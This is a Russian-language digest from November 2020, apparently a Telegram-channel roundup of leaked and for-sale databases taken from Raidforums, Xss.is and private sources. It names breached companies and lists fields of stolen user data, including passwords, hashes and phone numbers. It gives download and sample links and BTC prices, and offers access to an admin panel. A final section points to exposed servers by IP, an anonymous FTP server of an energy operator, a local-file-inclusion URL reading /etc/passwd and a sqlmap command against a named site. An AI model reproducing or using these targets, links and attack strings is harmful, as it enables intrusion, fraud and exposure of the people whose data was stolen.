В открытый доступ выложили базу данных; На продажу выставили базу данных и т.д. (10.11.2020)
"Перестаньте читать Ашота" (с) ДжонРиппер
Специально для канала https://t.me/freedomf0x
Phreaker.pro
1) https://onboarding.sberbank.kz/admin
База данных json 7942 строк, интересные поля в массиве: IIN, FirstName, LastName, MiddleName, PhoneMobil
Выборка email Password
3) Жители Ленинградской области 2006
Кол-во: 1,517,980
Raidforums.com
1) Kickfire.com Database
n early 2020, the "IP Address intelligence" website Kickfire.com suffered a data breach that impacted entire backend. The exposed data included email addresses, usernames, names, company informations, ip domains and entire sale informations and many more.Size of database is 26.6GB, compressed size is 3.4GB.
Compromised data: Email addresses, Geographic locations, Names, Usernames, IP Domains, Company Name, Revenue, Address etc.
2) email & phone
email & phone data.json
3) Fresh 2020 Forex Leads 40K
id,fn,ln,email,phone,country,datereg,europefx,Abcd1234,Status,Partner,Agent,Europefx.com,Balance
4) sdam-snimu.ru database
mail:password
Rows:5k
Data leak:18.09.2020
5) Mondragon.edu Database
In early 2020, the "Mondragon University is a non-profit cooperative private university in the Basque Country," website Mondragon.edu suffered a data breach that impacted entire backend. The incident exposed 1248 user records.
Compromised data: uuid_,userId,companyId,createDate,modifiedDate,defaultUser,contactId,password_,passwordEncrypted,passwordReset,passwordModifiedDate,digest,reminderQueryQuestion,reminderQueryAnswer,graceLoginCount,screenName,emailAddress,facebookId,ldapServerId,openId,portraitId,languageId,timeZoneId,greeting,comments,firstName,middleName,lastName,jobTitle,loginDate,loginIP,lastLoginDate,lastLoginIP,lastFailedLoginDate,failedLoginAttempts,lockout,lockoutDate,agreedToTermsOfUse,emailAddressVerified,status
6) tibet-shop.ru database
mail:password
Rows:10k
Data leak:08.2020
7) Kingfisherworld.com Database
In early 2020, the "Kingfisher is an Indian beer brewed by United Breweries Group, Bangalore." website Kingfisherworld.com suffered a data breach that impacted entire backend. The incident exposed 77.221 user records containing name,age,email,city,mobile,address etc.
Compromised data: Name, Age, Email, City, Mobile, Address and others.
8) binm.org - Naturopathic Medicine is Western Canad
https://pastebin.com/yadA3uS2
https://198.12.228.132/ecampus_ccaco.sql
https://198.12.228.132/ccacodata_old.zip
9) USA BIG data sale. Cellular DB 180M, US Consumers DB 245M
the 1st one is USA Consumers DB 245M in total, contain duplicated phones with different family members (those are landlines)
I tried to filter mobiles from this DB and i know that about 35% of phones are mobiles. Database contain info about household income, etc.
sell it on 750$ price via BTC.
the 2nd is Cellular 190M db which contain 90M unique US mobiles from 2020.
You can check out a samples here, the price for 2nd db is 350$.
DB1 sample https://mega.nz/file/d2ZnGYTQ#sTdB1PY_agYXV92it94lhcqbpF6t5fOvflfdQEfaP7Y
DB2 sample https://mega.nz/file/ZqQzFYqZ#v8hfRD_6teX9pVKeHUg8ZJ19L_eAiE6yxembT1gFD0Y
10) Canada Business Registration
selling access to admin panel on Canadian business registration service.
Total user 77k
Asking price $ 1K
Xss.is
1) Honestinsite.com
Дата утечки: 13.07.2020
2) Database https://gsm-opt.ru/ 87K
Количество записей: 87К
Период базы: 2019
3) www.homechef.com
Date: 02/2020
Algorithm: BCRYPT ($2a$10$)
Row count: 8717763
"id","email","encrypted_password","reset_password_token","reset_password_sent_at","remember_created_at","sign_in_count","current_sign_in_at","last_sign_in_at","current_sign_in_ip","last_sign_in_ip","created_at","updated_at","name","customer_id","last_4_digits","provider","uid","status","servings","confirmation_token","confirmed_at","confirmation_sent_at","unconfirmed_email","phone","delivery_day","culinary_level","agreed_to_terms","discovery","weekly_meals","age","gender","region","relationship","campaign_id","promotion_type","min_age","max_age","behavior","interest","optional_1","optional_2","optional_3","optional_4","optional_5","active","signup_redemption_id","zip_code_id","completed_signup_at","current_sign_in_platform","last_sign_in_platform","web_sign_in_at","mobile_sign_in_at","experiment_data","preference_data","meal_plan_id","vendor","paypal_email","terms_accepted_at","shipping_cost_cents","accepted_agreements","uuid","brand_id","monthly_credit"
Приватные источники
1) URL = https://178.124.218.221
JBoss dev page = https://178.124.218.221/web-console/status?full=true
Sensitive info = https://178.124.218.221/config.php
2) http://91.203.82.235:8080/
3) https://185.120.189.31/
4) URL = http://clientbase.ru/
LFI = https://clientbase.ru/img.php?h=0&img=../../../../../../../../../../etc/passwd
SQLi: sqlmap.py -u "https://clientbase.ru/buy/z/?usr="
5) ftp://94.19.192.59:21
анонимный ftp сервер сотрудника Системного оператора Единой энергетической системы. Самое вкусное- папка work. 113 гигабайт документов и чертежей. 94.19.192.59:21
6) http://93.125.21.187/